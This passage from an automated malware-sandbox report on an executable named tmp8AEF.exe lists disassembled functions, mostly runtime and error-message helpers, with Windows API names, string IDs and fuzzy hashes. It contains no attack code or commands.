                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value
                                                                                        • String ID:
                                                                                        • API String ID: 3702945584-0
                                                                                        • Opcode ID: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                        • Instruction ID: 5950acdc0486caaf04717c9d61a85c7be4463ba4d50dba437fd2e5c25e3ec809
                                                                                        • Opcode Fuzzy Hash: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                        • Instruction Fuzzy Hash: AF116320A0C64612FE55BF277571179B2617F4D3B1F9863B4D83D076D6DD2CAD114720
                                                                                        Function 00007FF7CA7AA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value
                                                                                        • String ID:
                                                                                        • API String ID: 3702945584-0
                                                                                        • Opcode ID: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                        • Instruction ID: 45f58f79a99c57b27897959b6dc8e61bf80e83054fb8133a630ea4285d17a48e
                                                                                        • Opcode Fuzzy Hash: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                        • Instruction Fuzzy Hash: 88114860A0960B62FE59BE377431179A2912F4E372FD827B4D93E0A2D2ED2CBC104735
                                                                                        Function 00007FF7CA7A52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: verbose
                                                                                        • API String ID: 3215553584-579935070
                                                                                        • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                        • Instruction ID: 42c661bcbece017b442733abeb23d88a5d058ca9426d124f2484c1d4d4e6cfe0
                                                                                        • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                        • Instruction Fuzzy Hash: B491E432A08A4661F724AE26E46037DB396BB48B76FC86175DA4D463D5DF3DEC018321
                                                                                        Function 00007FF7CA7AEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                        • API String ID: 3215553584-1196891531
                                                                                        • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                        • Instruction ID: 0c144e2ecb50d7636b6925de7a29a5c782a1931f447a0a3cb7c6a3e60471b921
                                                                                        • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                        • Instruction Fuzzy Hash: 4A81F672F09103A5F7647F27E170279B6A0FB1876AFD5A0B1DA4997285DB2DEC018331
                                                                                        Function 00007FF7CA79C968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 2395640692-1018135373
                                                                                        • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                        • Instruction ID: f59913bbb08c61f2ced89a18c217199cb1c56ce33f84925074157c3307ef255d
                                                                                        • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                        • Instruction Fuzzy Hash: CD519E32B196428EEF14EF37F424A79B391FB48BA9F904172DA4D47788DE78E8418710
                                                                                        Function 00007FF7CA79E1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallEncodePointerTranslator
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 3544855599-2084237596
                                                                                        • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                        • Instruction ID: 12bc4066f47c5cf2f26f388afaf4c1314fd1017b39310e591eaec9de738e6420
                                                                                        • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                        • Instruction Fuzzy Hash: ED619432908BC585E7209F36F4507AAB7A4FB897A5F444266EB9C03795DF7CD090CB10
                                                                                        Function 00007FF7CA79E5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                        • String ID: csm$csm
                                                                                        • API String ID: 3896166516-3733052814
                                                                                        • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                        • Instruction ID: 5326777674beaa965d12275125078753be9f03437c6b80fe1827463bbd576005
                                                                                        • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                        • Instruction Fuzzy Hash: 4151823290834286FB64AE33A064A78B7A0FB58BA6F944177DA9D47BD1CF3CE4508711
                                                                                        Function 00007FF7CA797530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateDirectoryW.KERNEL32(00000000,?,00007FF7CA79324C,?,?,00007FF7CA793964), ref: 00007FF7CA797642
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory
                                                                                        • String ID: %.*s$%s%c$\
                                                                                        • API String ID: 4241100979-1685191245
                                                                                        • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                        • Instruction ID: 002285329ed3f6506d8bae41864c4556f72e979e1e70d65422961150d032a31e
                                                                                        • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                        • Instruction Fuzzy Hash: AC31CB21A19AC545FA61AF36F430BA6A364FB8CBF1F844272EE5D437C5DE2CD2018710
                                                                                        Function 00007FF7CA792870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                        • String ID: Error/warning (ANSI fallback)$Warning
                                                                                        • API String ID: 1878133881-2698358428
                                                                                        • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                        • Instruction ID: 902bcbc48833cb67f2cc5926dffba0efb30bbc10e09ae82c726e70d99cb204e9
                                                                                        • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                        • Instruction Fuzzy Hash: 24118B72628B8591FA20AF22F461BA9B364FB88B95FD01176DA8C57684DF3CD604C750
                                                                                        Function 00007FF7CA7925F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                        • String ID: Error$Error/warning (ANSI fallback)
                                                                                        • API String ID: 1878133881-653037927
                                                                                        • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                        • Instruction ID: f5444911847bd7a84016f41e0019691e028c2cfde0bc4f5d5745e548efa22d5d
                                                                                        • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                        • Instruction Fuzzy Hash: 9D11D072628B8581FB20AF22F471BA9B364FB88B95FD01176DA4C07684CF3CD604C750
                                                                                        Function 00007FF7CA7AB8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                        • String ID:
                                                                                        • API String ID: 2718003287-0
                                                                                        • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                        • Instruction ID: 3aae53cde25901dab26c5270146052a22823f7f11ea0cdc4f4d738275c9c6da7
                                                                                        • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                        • Instruction Fuzzy Hash: D7D10373B08A8099F710DF76E4506AC7771FB887A9B805275CE5E57B99DE38D806C310
                                                                                        Function 00007FF7CA7AEC9C Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _get_daylight$_isindst
                                                                                        • String ID:
                                                                                        • API String ID: 4170891091-0
                                                                                        • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                        • Instruction ID: 6829505eb31c219c3d1ef99fd4b41bf87d6c916007596c1208de525c2d2db732
                                                                                        • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                        • Instruction Fuzzy Hash: 60514972F082219AFB14EF65A8652BCB7B1BB1837BF901175DD1E52AE5DF38A801C710
                                                                                        Function 00007FF7CA7A4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                        • String ID:
                                                                                        • API String ID: 2780335769-0
                                                                                        • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                        • Instruction ID: f2bc9441cd62ff9c61be3ef5be9b2931b70133ac04ead9a66900763bdfeeb424
                                                                                        • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                        • Instruction Fuzzy Hash: 6251A023A086419AFB14EF72E4603BDA3A1FB4CB69F609075DE0D47688DF39D8518760
                                                                                        Function 00007FF7CA792030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 1956198572-0
                                                                                        • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                        • Instruction ID: 519992e76185060c5ec83be4f91c7b2ab90aa1c3e55903127899a534cbc0d5a6
                                                                                        • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                        • Instruction Fuzzy Hash: 4611C631A0824242FA54BF7FF564AB99291FF9DBB1FC48072DE4907B89DD2CD4C58660
                                                                                        Function 00007FF7CA79C330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                        • String ID:
                                                                                        • API String ID: 2933794660-0
                                                                                        • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                        • Instruction ID: ee83ad6b4579857d429fee5dd07026ccfa646570de9a954e2d3c1a2e719bafb2
                                                                                        • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                        • Instruction Fuzzy Hash: 43114C22B14B058AFB009F61F8642A973A4FB5D769F840E31DE2D467A4DF78D1948350
                                                                                        Function 00007FF7CA7B4E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                        • String ID: ?
                                                                                        • API String ID: 1286766494-1684325040
                                                                                        • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                        • Instruction ID: f6b4a07951dafbd72bd2796f881b4235a16fe89fad4604767ee3182d2c4eebd0
                                                                                        • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                        • Instruction Fuzzy Hash: FD415762A0878256FB20AF27B42137AE750FBA8BB5F944274EE5C07AD5DF3CD4518710
                                                                                        Function 00007FF7CA7A832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7A835E
                                                                                          • Part of subcall function 00007FF7CA7A9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C6E
                                                                                          • Part of subcall function 00007FF7CA7A9C58: GetLastError.KERNEL32(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C78
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7CA79BEC5), ref: 00007FF7CA7A837C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                        • API String ID: 3580290477-4079050925
                                                                                        • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                        • Instruction ID: 8b9c2218cb89a7f3ae927790cc501ff7db176ff6db16334ef48eb104e5c9268c
